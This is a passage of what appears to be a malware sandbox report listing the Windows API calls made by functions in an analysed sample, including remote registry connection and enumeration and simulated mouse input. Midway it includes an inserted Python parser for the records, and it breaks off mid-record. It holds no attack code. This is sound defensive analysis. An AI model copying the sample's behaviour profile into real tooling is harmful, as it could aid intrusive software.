  • Part of subcall function 00EE1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EE1D91
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F67632
• SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F6763F
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F6764A
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F67659
• SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F67665
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: MessageSend$CreateObjectStockWindow
• String ID: Msctls_Progress32
• API String ID: 1025951953-3636473452
• Opcode ID: 520d1e155d748b2617b7aa0342c56119a44fcf049723ce0eae34eea623e7991c
• Instruction ID: 9c58035a8ba0a92f1c3bb68451b389d2d01d83a1fcff54e4778c70d5339cf9df
• Opcode Fuzzy Hash: 520d1e155d748b2617b7aa0342c56119a44fcf049723ce0eae34eea623e7991c
• Instruction Fuzzy Hash: 0611B2B211021DBFEF119F64CC85EE77F6DEF087A8F014114BA04A20A0CA729C21EBA4

APIs
• __init_pointers.LIBCMT ref: 00F09AE6
  • Part of subcall function 00F03187: EncodePointer.KERNEL32(00000000), ref: 00F0318A
  • Part of subcall function 00F03187: __initp_misc_winsig.LIBCMT ref: 00F031A5
  • Part of subcall function 00F03187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F09EA0
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F09EB4
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F09EC7
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F09EDA
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F09EED
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F09F00
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00F09F13
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F09F26
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F09F39
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F09F4C
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F09F5F
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F09F72
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F09F85
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F09F98
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F09FAB
  • Part of subcall function 00F03187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F09FBE
• __mtinitlocks.LIBCMT ref: 00F09AEB
• __mtterm.LIBCMT ref: 00F09AF4
  • Part of subcall function 00F09B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F09AF9,00F07CD0,00F9A0B8,00000014), ref: 00F09C56
  • Part of subcall function 00F09B5C: _free.LIBCMT ref: 00F09C5D
  • Part of subcall function 00F09B5C: DeleteCriticalSection.KERNEL32(00F9EC00,?,?,00F09AF9,00F07CD0,00F9A0B8,00000014), ref: 00F09C7F
• __calloc_crt.LIBCMT ref: 00F09B19
• __initptd.LIBCMT ref: 00F09B3B
• GetCurrentThreadId.KERNEL32 ref: 00F09B42
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: 79336a102703551f6145b06985cb3cb5a2880fc5f0b6d41a4d67c419b6c4b0a3
• Instruction ID: 3c7bcc6dca6cf7395e58ec5f8889d5e331184873b842d66194f0b20845d1aaa3
• Opcode Fuzzy Hash: 79336a102703551f6145b06985cb3cb5a2880fc5f0b6d41a4d67c419b6c4b0a3
• Instruction Fuzzy Hash: 21F06D32A5E7115AEA24B774BC0764A3A949B42770B204A1AF4A4951D3FEE8854171A0

APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F03F85), ref: 00F04085
• GetProcAddress.KERNEL32(00000000), ref: 00F0408C
• EncodePointer.KERNEL32(00000000), ref: 00F04097
• DecodePointer.KERNEL32(00F03F85), ref: 00F040B2
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: c9c5c28f82beb0b1b998d06ec32e3bdedbc94e8a6d62e7b0049a29d8261ae76c
• Instruction ID: a30363acab6599cfb9a1eec755e91d72cacfa45c563a76b69085a1bdbc8ccd79
• Opcode Fuzzy Hash: c9c5c28f82beb0b1b998d06ec32e3bdedbc94e8a6d62e7b0049a29d8261ae76c
• Instruction Fuzzy Hash: C7E0BFB0E41308DFEB609F61FC0EB157AA4B705742F204025F125E11A0CBB69604FA15

APIs
• GetClientRect.USER32(?,?), ref: 00EE1DDC
• GetWindowRect.USER32(?,?), ref: 00EE1E1D
• ScreenToClient.USER32(?,?), ref: 00EE1E45
• GetClientRect.USER32(?,?), ref: 00EE1F74
• GetWindowRect.USER32(?,?), ref: 00EE1F8D
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
• Opcode ID: 78ce8ef8ee1c60b1c2f17f917f5bca66d7abd4eb924d61d962e4a63ba4d4b425
• Instruction ID: f5c6ad124284dc11b6a7eb35bda6e5547c4e0b395f11679277155078eb226cc9
• Opcode Fuzzy Hash: 78ce8ef8ee1c60b1c2f17f917f5bca66d7abd4eb924d61d962e4a63ba4d4b425
• Instruction Fuzzy Hash: 18B16E79A0028DDBDF10CFA9C4807EDB7B1FF48314F149169EC59AB254DB70A980DB95
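The function records on this page all share one layout (APIs, Memory Dump Source, Joe Sandbox IDA Plugin, Similarity), and pivoting on them (which functions touch ADVAPI32, which memory dump a ref address lives in, which opcode IDs to cluster) is easier once they are parsed. The following is an added example, not code from the Joe Sandbox report or from Joe Security's tooling: a Python parser for this rendering of the records, fed a constructed sample copied from two of the records above (with the page's "Download File" link residue deliberately left in so the parser shows it being stripped), plus helpers that count direct API calls per module and find functions calling a named API. The dict field names are my own choice, not a Joe Sandbox schema.

```python
"""Parse Joe Sandbox 'Execution Graph' function records as rendered on the report page."""
import re
from collections import Counter

# Constructed sample: two records copied from the report, residue included.
SAMPLE = """
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00F03F85), ref: 00F04085
• GetProcAddress.KERNEL32(00000000), ref: 00F0408C
• EncodePointer.KERNEL32(00000000), ref: 00F04097
• DecodePointer.KERNEL32(00F03F85), ref: 00F040B2
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: c9c5c28f82beb0b1b998d06ec32e3bdedbc94e8a6d62e7b0049a29d8261ae76c
• Instruction Fuzzy Hash: C7E0BFB0E41308DFEB609F61FC0EB157AA4B705742F204025F125E11A0CBB69604FA15
APIs
  • Part of subcall function 00F60E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F602BD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F602FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F60349
• RegCloseKey.ADVAPI32(00000000), ref: 00F60399
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "Name.MODULE(args), ref: ADDR", optionally prefixed with the subcall marker.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-F]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]+)$"
)
SRC_RE = re.compile(r"^Source File: (\S+), Offset: ([0-9A-F]+), based on PE: (true|false)$")
LIST_KEYS = {"api_id", "string_id"}   # '$'-separated lists in the Similarity block


def new_record():
    return {"apis": [], "strings": [], "source_file": None, "offset": None,
            "associated": [], "snapshot": None, "similarity": {}}


def parse_records(text):
    """Split the page text into one dict per function record."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()      # drop indentation and bullet
        if not line:
            continue
        if line in HEADINGS:
            if line == "APIs":                      # every record opens with APIs
                if rec is not None:
                    records.append(rec)
                rec = new_record()
            section = line
            continue
        if rec is None:                             # stray text before the first record
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                api = m.groupdict()
                api["args"] = api["args"].split(",") if api["args"] else []
                rec["apis"].append(api)
        elif section == "Strings":
            rec["strings"].append(line)
        elif section == "Memory Dump Source":
            if line.startswith("Source File: "):
                m = SRC_RE.match(line)
                if m:
                    rec["source_file"], rec["offset"] = m.group(1), m.group(2)
            elif line.startswith("Associated: "):
                # Strip the 'Download File' link text the page extraction fused on.
                rec["associated"].append(re.sub(r"Download File$", "", line[len("Associated: "):]))
        elif section == "Joe Sandbox IDA Plugin":
            if line.startswith("Snapshot File: "):
                rec["snapshot"] = line[len("Snapshot File: "):]
        elif section == "Similarity":
            key, _, value = line.partition(":")
            key, value = key.strip().lower().replace(" ", "_"), value.strip()
            rec["similarity"][key] = value.split("$") if value and key in LIST_KEYS else value
    if rec is not None:
        records.append(rec)
    return records


def direct_calls(rec):
    """APIs the function itself makes; 'Part of subcall' entries belong to callees."""
    return [a for a in rec["apis"] if a["caller"] is None]


def module_histogram(records):
    return Counter(a["module"] for r in records for a in direct_calls(r))


def find_calling(records, names):
    names = set(names)
    return [r for r in records if names & {a["name"] for a in direct_calls(r)}]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print(len(recs), "records;", dict(module_histogram(recs)))
    for r in find_calling(recs, ["RegEnumValueW"]):
        refs = [a["ref"] for a in direct_calls(r)]
        print("registry enumeration at", refs, "in", r["source_file"], "snapshot", r["snapshot"])
```

The ref addresses are image-relative to the dump's Offset (00EE0000 here), so a hit can be taken straight to the listed snapshot file in the Joe Sandbox IDA plugin; subcall entries are kept but excluded from `direct_calls` so that callee APIs do not inflate a function's own profile.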

APIs
Memory Dump Source
• Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
• Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: b8725dfc3b8e9107be434ab14099c2fbccf84fb614c00f577f5f48245dd0dce5
• Instruction ID: 354afa1e405c0ade1eaa2a3f983a27ad643b15a2919399b781f19a469eea7a40
• Opcode Fuzzy Hash: b8725dfc3b8e9107be434ab14099c2fbccf84fb614c00f577f5f48245dd0dce5
• Instruction Fuzzy Hash: 2A618C7190029A9BCF05EF61CC82FFE3BA5AF05308F054529FD59AB192DB38D905EB51
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE7DE1: _memmove.LIBCMT ref: 00EE7E22
                                                                                                                              • Part of subcall function 00F60E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5FDAD,?,?), ref: 00F60E31
                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F602BD
                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F602FD
                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F60320
                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F60349
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F6038C
                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F60399
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4046560759-0
                                                                                                                            • Opcode ID: e408f8c19396836f2f975aa3a50ca20a66787cfb4b806d2b329a2891e21d4e2f
                                                                                                                            • Instruction ID: 3573569e51291636e3c7975acf0867f73c62dbc2cd07557fc1a9fe8aec6d3aaf
                                                                                                                            • Opcode Fuzzy Hash: e408f8c19396836f2f975aa3a50ca20a66787cfb4b806d2b329a2891e21d4e2f
                                                                                                                            • Instruction Fuzzy Hash: BB515871608244AFC700EF64D886E6FBBE8FF84314F14492DF5959B2A2DB31E904EB52
                                                                                                                            APIs
                                                                                                                            • GetMenu.USER32(?), ref: 00F657FB
                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00F65832
                                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F6585A
                                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00F658C9
                                                                                                                            • GetSubMenu.USER32(?,?), ref: 00F658D7
                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F65928
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$CountMessagePostString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 650687236-0
                                                                                                                            • Opcode ID: 86453e2724b2d6b917422644027abdb8d2c8ecb4ad01971350312043ac1ba012
                                                                                                                            • Instruction ID: 288b365afe6654e425bbb720b4292666a2546017dc15d9c6b550f02127b4d820
                                                                                                                            • Opcode Fuzzy Hash: 86453e2724b2d6b917422644027abdb8d2c8ecb4ad01971350312043ac1ba012
                                                                                                                            • Instruction Fuzzy Hash: 80514C35E00619EFCF15EF64C845AAEBBB4EF48720F144069E852BB351CB74AE41EB94
                                                                                                                            APIs
                                                                                                                            • VariantInit.OLEAUT32(?), ref: 00F3EF06
                                                                                                                            • VariantClear.OLEAUT32(00000013), ref: 00F3EF78
                                                                                                                            • VariantClear.OLEAUT32(00000000), ref: 00F3EFD3
                                                                                                                            • _memmove.LIBCMT ref: 00F3EFFD
                                                                                                                            • VariantClear.OLEAUT32(?), ref: 00F3F04A
                                                                                                                            • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00F3F078
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1101466143-0
                                                                                                                            • Opcode ID: 43e7c511acbc2e6a23956595a7d3bbbb2218d49b972ff746500cc560e19fb0e0
                                                                                                                            • Instruction ID: 013ddd42e4c2a50eae4ef99a02398dc89c0cb0ffe3b9b1f6edf45a8122f6922f
                                                                                                                            • Opcode Fuzzy Hash: 43e7c511acbc2e6a23956595a7d3bbbb2218d49b972ff746500cc560e19fb0e0
                                                                                                                            • Instruction Fuzzy Hash: 0C5169B5A00209EFCB14CF58D880AAAB7B8FF4C324F158569E959DB345E734E915CFA0
                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 00F42258
                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F422A3
                                                                                                                            • IsMenu.USER32(00000000), ref: 00F422C3
                                                                                                                            • CreatePopupMenu.USER32 ref: 00F422F7
                                                                                                                            • GetMenuItemCount.USER32(000000FF), ref: 00F42355
                                                                                                                            • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F42386
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3311875123-0
                                                                                                                            • Opcode ID: 08ae0f17073fcbe68f00e357d06e199378523ebb9eeed078b3480a9d0f372b0c
                                                                                                                            • Instruction ID: 25d0836af7fc47371edcbd3a289ce8554013793c9a98149222c114269c506eb4
                                                                                                                            • Opcode Fuzzy Hash: 08ae0f17073fcbe68f00e357d06e199378523ebb9eeed078b3480a9d0f372b0c
                                                                                                                            • Instruction Fuzzy Hash: 4051AC30A00209DBDF61CF68D888BAEBFF5AF45324F548139FC15A7290D3B89944EB51
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00EE2612: GetWindowLongW.USER32(?,000000EB), ref: 00EE2623
                                                                                                                            • BeginPaint.USER32(?,?,?,?,?,?), ref: 00EE179A
                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00EE17FE
                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00EE181B
                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00EE182C
                                                                                                                            • EndPaint.USER32(?,?), ref: 00EE1876
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1827037458-0
                                                                                                                            • Opcode ID: a288f7687f028f5546d9b26704e92b1e63f48cb4b8801fb1938a0645502d0fec
                                                                                                                            • Instruction ID: a013c75997eaed2bb8a65ac807adf3c0913b36816891ea6176f6a11552532a6b
                                                                                                                            • Opcode Fuzzy Hash: a288f7687f028f5546d9b26704e92b1e63f48cb4b8801fb1938a0645502d0fec
                                                                                                                            • Instruction Fuzzy Hash: 4041CF70504348EFC710DF25DC84FBA7BE8EB4AB24F044269F9A4972B1C7719885EB62
                                                                                                                            APIs
                                                                                                                            • ShowWindow.USER32(00FA57B0,00000000,01205408,?,?,00FA57B0,?,00F6B5A8,?,?), ref: 00F6B712
                                                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 00F6B736
                                                                                                                            • ShowWindow.USER32(00FA57B0,00000000,01205408,?,?,00FA57B0,?,00F6B5A8,?,?), ref: 00F6B796
                                                                                                                            • ShowWindow.USER32(00000000,00000004,?,00F6B5A8,?,?), ref: 00F6B7A8
                                                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 00F6B7CC
                                                                                                                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00F6B7EF
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729851644.0000000000FA7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_ee0000_3i1gMM8K4z.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 642888154-0
                                                                                                                            • Opcode ID: 4a04f3dfd81d64e8ac5163ea9315c3a2d3aaf5774dbdee4ff5369f45d5db83f3
                                                                                                                            • Instruction ID: 0e90560ea3499f43a318dade89a7d5f23d6aaf5ec0aa6fd9ce12db88904e591a
                                                                                                                            • Opcode Fuzzy Hash: 4a04f3dfd81d64e8ac5163ea9315c3a2d3aaf5774dbdee4ff5369f45d5db83f3
                                                                                                                            • Instruction Fuzzy Hash: D041A334A00254EFDB22CF24D499B947BE1FF45321F1842B9F958CF6A2C771A896EB50
                                                                                                                            APIs
                                                                                                                            • GetForegroundWindow.USER32(?,?,?,?,?,?,00F54E41,?,?,00000000,00000001), ref: 00F570AC
                                                                                                                              • Part of subcall function 00F539A0: GetWindowRect.USER32(?,?), ref: 00F539B3
                                                                                                                            • GetDesktopWindow.USER32 ref: 00F570D6
                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00F570DD
                                                                                                                            • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F5710F
                                                                                                                              • Part of subcall function 00F45244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F452BC
                                                                                                                            • GetCursorPos.USER32(?), ref: 00F5713B
                                                                                                                            • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F57199
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1729732647.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                                                             • Associated: 00000000.00000002.1729717927.0000000000EE0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F6F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729788981.0000000000F94000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                             • Associated: 00000000.00000002.1729827694.0000000000F9E000.00000004.00000001.01000000.00000003.sdmp
